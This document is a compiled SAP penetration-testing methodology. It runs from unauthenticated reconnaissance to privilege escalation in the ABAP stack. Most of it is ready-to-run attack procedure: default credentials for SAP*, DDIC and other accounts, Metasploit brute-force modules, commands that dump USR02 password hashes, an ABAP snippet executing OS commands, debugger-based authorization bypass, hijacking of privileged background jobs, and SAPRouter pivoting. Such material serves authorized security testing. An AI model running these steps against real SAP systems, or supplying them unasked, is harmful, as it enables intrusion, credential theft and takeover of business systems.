SAP Security Testing
Compiled SAP pentest methodology. Commands first — theory inline where needed. Covers the full chain from unauthenticated recon to privilege escalation inside the ABAP stack.
Recon and Enumeration
External Recon — Before Touching the Target
# Check redrays.io scanner (passive, no auth needed)
# Visit: https://erpscan.io or https://redrays.io
# Upload SAP host — identifies exposed services, known CVE fingerprints
# Shodan: find exposed SAP systems
shodan search "SAP NetWeaver" port:8000
shodan search "sap-ips" port:50000
Active Enumeration
# SAP-focused nmap sweep
nmap -sV -p 3200-3299,3300-3399,3600-3699,8000,44300,50000,50013,3299 <target>
# ICM endpoint probe (ABAP stack)
curl http://<target>:8000/sap/bc/ping
curl http://<target>:8000/sap/public/info
curl http://<target>:8000/sap/bc/soap/rfc/
# Message server leak (no auth, reveals all application servers)
curl http://<target>:3600/msgserver/text/logon
Metasploit Service Discovery
msf > use auxiliary/scanner/sap/sap_service_discovery
msf > set RHOSTS <target>
msf > run
msf > use auxiliary/scanner/sap/sap_icm_urlscan
msf > set RHOSTS <target>
msf > run
Default Credentials
Check these before anything else — still present on many production systems.
| Username | Password | Notes |
|---|---|---|
SAP* | 06071992 / PASS | Default admin, often still active |
DDIC | 19920706 | Data dictionary admin |
TMSADM | $1Pawd2& | Transport management |
SAPCPIC | ADMIN | CPI-C user |
EARLYWATCH | SUPPORT | EarlyWatch reporting user |
# MSF brute-force with default creds
msf > use auxiliary/scanner/sap/sap_rfc_bruteforce
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > run
# Or use a custom wordlist
msf > set USER_FILE /path/to/sap_users.txt
msf > set PASS_FILE /path/to/sap_passwords.txt
RFC Exploitation
RFC (Remote Function Call) is SAP's proprietary protocol for inter-system communication. Many function modules are callable over RFC and can leak data or execute commands.
Key RFC Function Modules
| Module | Purpose | Risk |
|---|---|---|
RFC_READ_TABLE | Read any DB table | Extracts USR02 hashes (partial), business data |
RFC_ABAP_INSTALL_AND_RUN | Install and run ABAP code | RCE on ABAP stack |
RFCEXEC | Execute OS commands | Direct OS-level RCE if accessible |
SUSR_USER_CHANGE_PASSWORD_RFC | Change any user's password | Credential reset without old password |
TH_SAPREL | Get SAP release info | Version disclosure |
SXPG_CALL_SYSTEM | Execute OS commands via ABAP | OS command execution |
Enumerate Available RFC Modules
msf > use auxiliary/scanner/sap/sap_rfc_dbcon
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > run
msf > use auxiliary/scanner/sap/sap_rfc_read_table
msf > set QUERY "SELECT MANDT,BNAME,BCODE,PASSCODE,PWDSALTEDHASH FROM USR02"
msf > run
Read USR02 Password Hashes via RFC
# Use dedicated module (more reliable than RFC_READ_TABLE for raw fields)
msf > use auxiliary/scanner/sap/sap_rfc_usr02
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > run
# Direct HANA SQL (if HANA DB access available)
hdbsql -n localhost -U DEFAULT \
"SELECT MANDT,BNAME,BCODE,GLTGB,PWDSTATE,PASSCODE FROM USR02 WHERE BCODE != 0x0000000000000000"
Privilege Escalation Inside SAP (Post-Auth)
Once you have any SAP account, check the following escalation paths.
1. S_DEVELOP — Debug and Parameter Modification
S_DEVELOP with ACTVT=02 (change) lets you set breakpoints, modify variables at runtime, and alter system parameters. This effectively bypasses authorization checks.
Transaction: /nSE80 or /nSE37
1. Open any program or function module in SE38/SE37
2. Set a breakpoint at authorization check
3. At breakpoint, change the return code of the auth check to allow
Also exploitable: if you can run arbitrary ABAP via SE38 or SA38:
// In SE38 — run program RSBDCOS0 to execute OS commands
REPORT RSBDCOS0.
CALL 'SYSTEM' ID 'COMMAND' FIELD 'whoami' ID 'TAB' FIELD output.
2. SAP_ALL / SAP_NEW — Full Admin Profile
SAP_ALL grants unrestricted access to all SAP objects. Check if any user has it:
Transaction: SUIM
-> User -> Users by Complex Selection Criteria
-> Profile: SAP_ALL
-> Execute
Assign it if you have user admin rights:
Transaction: SU01
-> User -> Change
-> Profiles tab -> Add SAP_ALL
3. Job Manipulation via SM37
SM37 (background job monitoring) allows editing another user's scheduled jobs. If the job runs as a more-privileged user, you can inject commands.
Transaction: SM37
-> Username: *
-> Job Status: Scheduled / Ready
-> Find jobs belonging to high-privilege users (DDIC, SAP*, BASIS users)
-> Edit steps -> modify command / program
4. SNC Bypass — WebGUI Sniffing
SNC (Secure Network Communications) protects DIAG and RFC traffic, but SAP WebGUI over HTTP/HTTPS may not enforce it. Credentials sent through WebGUI can be captured if the connection is unencrypted or the client trusts a rogue certificate.
# Check if WebGUI is accessible without SNC
curl http://<target>:8000/sap/bc/gui/sap/its/webgui
# If yes, credentials submitted through the browser are in cleartext or TLS-interceptable
# Set up a proxy (Burp) and watch for logon POST parameters
5. Fiori WebGUI Frontend Bypass
Fiori applies a front-end authorization layer that may not match the ABAP back-end. Navigate directly to backend OData services to bypass front-end restrictions.
# Access OData service directly
curl http://<target>:8000/sap/opu/odata/sap/<service_name>/
curl http://<target>:8000/sap/opu/odata/sap/<service_name>/<EntitySet>?$top=100
# Common service paths to check
curl http://<target>:8000/sap/opu/odata/sap/ZHRMASTER_SRV/EmployeeSet
curl http://<target>:8000/sap/opu/odata/sap/FINANCIAL_DOCUMENTS_SRV/
# List available services (if catalog endpoint is open)
curl http://<target>:8000/sap/opu/odata/IWFND/CATALOGSERVICE/ServiceCollection
Useful Transaction Codes (Once Logged In)
| T-Code | Purpose | Pentest Use |
|---|---|---|
SE38 | ABAP Editor | Run arbitrary programs |
SA38 | ABAP Reporting | Alternate program execution |
SM37 | Background Jobs | Job manipulation for privesc |
SU01 | User Maintenance | Create/modify users |
SU56 | User Buffer | View current authorization buffer |
SUIM | User Information | Find users with specific auth objects |
PFCG | Role Maintenance | Create/modify roles |
SM50 | Work Process Monitor | Active process list |
SE16 | Table Browser | Direct table access |
SE16N | Enhanced Table Browser | Access with field editing |
/nDBACOCKPIT | DB Cockpit | Direct database access |
SM69 | External OS Commands | Predefined OS command definitions |
STMS | Transport Management | Modify transport routes |
RZ10 | Profile Parameter Maintenance | Modify system parameters |
Key CVEs — Quick Reference
CVE-2020-6287 — SAP RECON (CVSS 10.0)
Unauthenticated RCE in SAP NetWeaver Java via the LM Configuration Wizard. No credentials required. See SAP RECON — CVE-2020-6287 for full exploitation steps.
# Check if vulnerable (LM Config Wizard exposed)
curl http://<target>:50000/developmentserver/metadatauploader
# HTTP 200 or non-404 = likely vulnerable
# Affects: SAP NetWeaver AS Java 7.30, 7.31, 7.40, 7.50
# Patch: SAP Security Note #2934135
CVE-2020-6207 — SAP SolMan EEM (CVSS 10.0)
Unauthenticated OS command execution via Solution Manager EEM/UXMon SOAP endpoint.
# Check if EEM endpoint is accessible
curl http://<target>:50000/EemAdminService/EemAdmin?wsdl
# If WSDL returns, endpoint is exposed
# Affects: SAP Solution Manager 7.2
# Patch: SAP Note #2890213
# PoC: github.com/chipik/SAP_EEM_CVE-2020-6207
CVE-2022-22536 — ICMAD HTTP Request Smuggling (CVSS 10.0)
HTTP request smuggling in SAP ICM (Internet Communication Manager). Allows session hijacking and privilege escalation without authentication. Affects ABAP and Java stacks, SAP Web Dispatcher, and SAP Content Server.
# Affects: SAP NetWeaver AS ABAP, AS Java, SAP Web Dispatcher, SAP Content Server 7.53
# Patch: SAP Security Note #3123396
# Indicators: malformed Content-Length in responses, unexpected session behavior
SAPRouter Exploitation (Port 3299)
SAPRouter acts as a network proxy for SAP traffic. A misconfigured SAPRouter can be used to tunnel connections to internal SAP systems.
# Ping SAPRouter
msf > use auxiliary/scanner/sap/sap_router_info_request
msf > set RHOSTS <target>
msf > set RPORT 3299
msf > run
# Route traffic through SAPRouter to internal hosts
# saprfc.ini or saprouttab controls routing rules
# If /H/ routing is open — use it as a pivot to internal SAP landscape
# Reference: https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
Code Scanning
Use redrays.io for automated static analysis of ABAP code and SAP configuration review:
- Checks for known vulnerable function modules
- Identifies authorization object misconfigurations
- Flags dangerous ABAP patterns (dynamic SQL, OS command calls)
- Maps your SAP landscape CVE exposure
# CLI scanner (if available in your environment)
# Or submit target via web interface at redrays.io